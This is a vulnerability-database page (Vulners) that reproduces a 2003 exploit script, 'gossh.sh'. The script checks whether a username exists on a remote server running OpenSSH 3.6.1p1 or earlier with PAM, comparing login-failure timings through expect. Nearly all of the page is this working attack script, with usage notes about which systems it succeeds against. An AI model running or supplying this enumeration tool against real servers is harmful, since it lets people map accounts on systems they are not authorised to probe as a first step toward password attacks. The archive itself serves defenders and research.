Vulners
Lucene search
OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - [email protected]
#
# Description:
# -Tells you wether or not a user exist on
# a distant server running OpenSSH.
#
# Usage:
# -You NEED to have the host's public key
# before executing this script.
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Fact Sheet: #
# o It is really accurate against #
# redhat boxes. #
# o Linux boxes running grsecurity #
# has 10 seconds delay on both #
# valid AND invalid user login #
# attempts. #
# o *BSD boxes are not vulnerables and #
# always has 10 seconds delay like #
# Linux-Grsec + network protection #
# #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:
# Thu May 1 15:41:18 EDT 2003
# ; Script started.
# Thu May 1 16:42:30 EDT 2003
# ; Script is functional.
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Let the user know how we work.
usage(){
echo "$0 <user> <host>"
exit 1
}
# Verify the arguments.
[ $# != 2 ] && usage
# Variables.
USER="$1"
HOST="$2"
#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions #
#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script for password.
expasswd() {
cat << EOF > expasswd
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}
# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}
#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing #
#=-=-=-=-=-=-=-=-=-=#
# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@$HOST"
# Build new expect script.
expasswd
experror
# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`
# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."
#=-=-=-=-=-=-=-=#
# -$USER timing #
#=-=-=-=-=-=-=-=#
# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"
# Build new expect scripts.
expasswd
experror
DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $SERVER..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`
# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."
#=-=-=-=-=#
# -Result #
#=-=-=-=-=#
if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
echo "This box is not vulnerable."
exit 1
fi
# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
echo "$USER doesn't exist on $HOST."
else
echo "Segmentation fault."
exit 13
fi
# Remove tmp files.
rm -rf expasswd experror
# EOF
# milw0rm.com [2003-05-02]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7